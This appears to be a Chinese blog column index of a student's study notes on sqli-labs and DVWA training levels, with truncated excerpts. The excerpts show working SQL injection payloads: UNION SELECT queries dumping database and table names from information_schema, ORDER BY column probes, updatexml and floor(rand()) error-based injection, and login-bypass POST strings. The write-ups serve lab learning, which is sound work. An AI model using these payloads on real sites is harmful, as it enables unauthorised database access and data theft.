sqli-labs系列
sqli-labs题目学习笔记
学编程的小w
热爱编程,对Python爬虫以及安全领域较感兴趣,并正在做深入学习研究。
展开
-
sql注入-sqli-labs第17关
sqli-labs第17关updatexml使用第17关的关键函数为updatexml函数:UpdateXML(xml_target, xpath_expr, new_xml)其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),原创 2021-11-10 22:02:33 · 1678 阅读 · 0 评论 -
insert注入
insert注入insert用法insert在数据库中可以直接插入数据,同时,insert还可以在数据库查询语句中用作字符串替换,例如:select insert("admin", 1, 1, "");上述语句查询结果为:可以看见,insert语句可以将字符串指定位置的指定长度替换为指定字符串,该功能的insert语法为:INSERT(s1,x,len,s2)其中的s1为目标字符串,x为替换的起始位置,len为替换的长度,s2为替换的字符串。通过改变len的值,可以获取到不同长度的字符串:原创 2021-11-10 09:01:52 · 2062 阅读 · 0 评论 -
sql二次注入-sqli-labs第13关
获取数据操作判断所查询数据库中包含的列数采用post进行参数输入:uname=') order by 3 -- - &passwd=') -- -通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。判断输出数据与数据库的联系输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则原创 2021-11-04 15:44:39 · 989 阅读 · 0 评论 -
sql整数型注入-sqli第2关
第二关注入语法http://sqli/less-1/?id=0 union select 111,222,database() -- - 爆当前使用的数据库名http://sqli/less-1/?id=0 union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- -爆数据库的表名http://sqli/less-1/?id=原创 2021-11-04 20:00:00 · 230 阅读 · 0 评论 -
sql字符型注入-sqli第1关
sql注入知识dvwa1' order by 1#1' order by 2#1' order by 3# 排序1' union select 111,222,333 ---可以查看前端与数据库之间的联系,即数据库在前端显示的出口!1' union select database(),user()# 联合查询database() 查询数据库名字user() 返回当前查询的用户名1' union select version(),@@version_compile_os# ver原创 2021-11-04 14:47:44 · 422 阅读 · 0 评论 -
sql报错型注入-sqli-labs第11关
获取数据的操作判断是否为字符型注入passwd=1' or '1'='1 &uname=1' or '1'='1输入post参数判断是否为字符型注入判断数据库中含有多少列通过查询语句:uname=1'or 1=1 order by 3 -- -&passwd=1' or 1=1 -- -可发现报错:Unknown column ‘3’ in ‘order clause’,则可说明查询的数据库中只有两列,则可确定后续的联合查询的参数数量。判断界面输出与数据库的接口原创 2021-11-03 20:17:48 · 575 阅读 · 0 评论 -
sql双引号二次注入-sqli-labs第6关
获取databasehttp://sqli/Less-6/?id=1" union select null, count(*), concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- -两次执行即可爆出database获取表名http://sqli/Less-6/?id=1" union select null, count(*), concat((select原创 2021-11-03 09:59:36 · 228 阅读 · 0 评论